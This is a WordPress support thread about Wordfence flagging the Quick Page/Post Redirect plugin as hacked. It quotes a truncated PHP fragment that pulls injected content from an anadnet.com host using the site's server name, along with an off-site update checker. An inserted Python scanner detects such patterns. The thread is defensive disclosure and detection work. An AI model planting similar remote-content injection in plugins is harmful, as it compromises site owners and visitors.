• mpedersen

    (@mpedersen)


    “File appears to be malicious or unsafe: wp-content/plugins/quick-pagepost-redirect-plugin/page_post_redirect_plugin.php
    Type: File”

    /wp-content/plugins/quick-pagepost-redirect-plugin/page_post_redirect_plugin.php
    File Type: Plugin
    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: !defined(‘CREDIT’)) {\x0d\x0a\x09\x09\x09\x09\x09$ctx=stream_context_create(array(‘http’=>array(‘timeout’ => 3)));\x0d\x0a\x09\x09\x09\x09\x09try{\x0d\x0a\x09\x09\x09\x09\x09\x09$credit=@file_get_contents(‘https://w.anadnet.com/bro/3/’.$_SERVER[‘SERVER_NAME’] . $_SE…

    The issue type is: Suspicious:PHP/CREDIT.content_injection.13029
    Description: Suspicious PHP code that injects SPAM into site content

    After a reinstall and a fresh scan, Wordfence still thinks there are problems.

    Modified plugin file: wp-content/plugins/quick-pagepost-redirect-plugin/page_post_redirect_plugin.php
    Type: File

    Details: This file belongs to plugin "Quick Page/Post Redirect Plugin" version "5.2.3" and has been modified from the file that is distributed by www.ads-software.com for this version. Please use the link to see how the file has changed. If you have modified this file yourself, you can safely ignore this warning. If you see a lot of changed files in a plugin that have been made by the author, then try uninstalling and reinstalling the plugin to force an upgrade. Doing this is a workaround for plugin authors who don't manage their code correctly.

    And, it appears, that among other things:

        // update functionality
        require dirname(__FILE__).'/updater/plugin-update-checker.php';
        $myUpdateChecker = Puc_v4_Factory::buildUpdateChecker(
           //'https://anadnet.com/updates/plugin.json',
           'https://anadnet.com/updates/?action=get_metadata&slug=quick-pagepost-redirect-plugin',
           __FILE__, //Full path to the main plugin file or functions.php.
           'quick-pagepost-redirect-plugin'
        );
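
A defender's check for the two patterns quoted in the post above, as an added example that is not part of the original thread or of the plugin's code: it flags `buildUpdateChecker` calls whose metadata URL is off an allowlist, and remote fetches whose URL is concatenated with request or server data. The allowlist hosts, the function names and the sample string are assumptions constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Assumption: update hosts you accept; adjust for your own environment.
TRUSTED_UPDATE_HOSTS = {"api.wordpress.org", "downloads.wordpress.org"}

LINE_COMMENT = re.compile(r"(?m)^\s*(?://|#).*$")   # whole-line PHP comments
UPDATER_CALL = re.compile(r"buildUpdateChecker\s*\((.*?)\)\s*;", re.S)
QUOTED_URL = re.compile(r"""['"](https?://[^'"]+)['"]""")
# Remote fetch whose URL is concatenated with request or server data.
REMOTE_FETCH = re.compile(
    r"""(?:file_get_contents|wp_remote_get)\s*\(\s*['"](https?://[^'"]+)['"]"""
    r"""\s*\.\s*\$_(?:SERVER|GET|POST|REQUEST)""")

def scan_source(src):
    """Return (finding, host) pairs for one PHP source string."""
    code = LINE_COMMENT.sub("", src)  # ignore commented-out URLs
    findings = []
    for call in UPDATER_CALL.finditer(code):
        for url in QUOTED_URL.findall(call.group(1)):
            host = urlparse(url).hostname
            if host not in TRUSTED_UPDATE_HOSTS:
                findings.append(("offsite-updater", host))
    for url in REMOTE_FETCH.findall(code):
        findings.append(("remote-fetch-with-request-data", urlparse(url).hostname))
    return findings

def scan_plugins(root):
    """Scan every .php file under root; return {path: findings} for hits."""
    scanned = {str(p): scan_source(p.read_text(errors="replace"))
               for p in sorted(Path(root).rglob("*.php"))}
    return {path: found for path, found in scanned.items() if found}

# Constructed sample based on the fragments quoted in the post above.
SAMPLE = r"""
// update functionality
$myUpdateChecker = Puc_v4_Factory::buildUpdateChecker(
   //'https://anadnet.com/updates/plugin.json',
   'https://anadnet.com/updates/?action=get_metadata&slug=quick-pagepost-redirect-plugin',
   __FILE__,
   'quick-pagepost-redirect-plugin'
);
$credit = @file_get_contents('https://w.anadnet.com/bro/3/' . $_SERVER['SERVER_NAME']);
"""

if __name__ == "__main__":
    for finding in scan_source(SAMPLE):
        print(finding)
```

Point `scan_plugins()` at a site's `wp-content/plugins` directory to list every file that pulls updates or content from a host outside the allowlist.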
Viewing 7 replies - 1 through 7 (of 7 total)
  • Thread Starter mpedersen

    (@mpedersen)

    Reviewing the “differences”, it appears that the “ad supported network” code is also back! I’m in the process of investigating the copy of the plugin that I downloaded to verify:

        function ppr_notice_hook() {
            add_filter( 'plugin_row_meta', array( $this, 'ppr_add_notice' ), 10, 2 );
            add_action( 'upgrader_process_complete', function ( $upgrader_object, $options ) {
                $our_plugin = plugin_basename( __FILE__ );

                if ( $options['action'] == 'update' && $options['type'] == 'plugin' && isset( $options['plugins'] ) ) {
                    foreach ( $options['plugins'] as $plugin ) {
                        if ( $plugin == $our_plugin ) {
                            update_option( 'ppr_show_notice', 0 );
                        }
                    }
                }
            }, 10, 2 );
        }

        function ppr_add_notice( $links_array, $plugin_file_name ) {
            if ( strpos( $plugin_file_name, basename(__FILE__) ) ) {
                if ( (! $this->ppr_show_notice && current_user_can('administrator')) || (! $this->ppr_first_install && current_user_can('administrator')) ) {
                    $links_array[] = '<div class="notice notice-warning inline">Quick Page/Post Redirect Plugin contains advertising support - by installing and/or using it, the plug-in will become part of an advertising-supported network. <br>The plug-in may be purchased without advertising support at <a href="https://anadnet.com/pro/" target="_blank">anadnet.com/pro/</a>.</div>';

                    update_option( 'ppr_show_notice', 1 );
                    update_option( 'ppr_first_install', 1 );
                }
            }

            return $links_array;
        }

    Thread Starter mpedersen

    (@mpedersen)

    And, once the scan completes, the version I uploaded from WordPress is still having the original “hacked” messaging.

    Thread Starter mpedersen

    (@mpedersen)

    OK, potentially the conflict was from installing an older copy. I’ve reinstalled from WP on multiple sites and re-scanned, and Wordfence is now happy. Not sure where/what the “hack” came from, but it showed up on all sites it seems.

    Thread Starter mpedersen

    (@mpedersen)

    Looking at all the unanswered stuff, and the security type problems that seem to plague this formerly good plugin, I’m trying out https://www.ads-software.com/plugins/redirection/ – imports the redirects from this one, so that’s a start.

    Jeff Cohan

    (@jdcohan)

    Can we have a response from the authors, please? I, too, received this critical warning from WordFence.

    Maybe this will become a different kind of METOO movement? Am also seeing this “hacked” message in Wordfence.

    Come on author(s), where is a response to this?

    I have the exact same issue. Following this thread

  • The topic ‘Wordfence Flagging Plugin As Hacked’ is closed to new replies.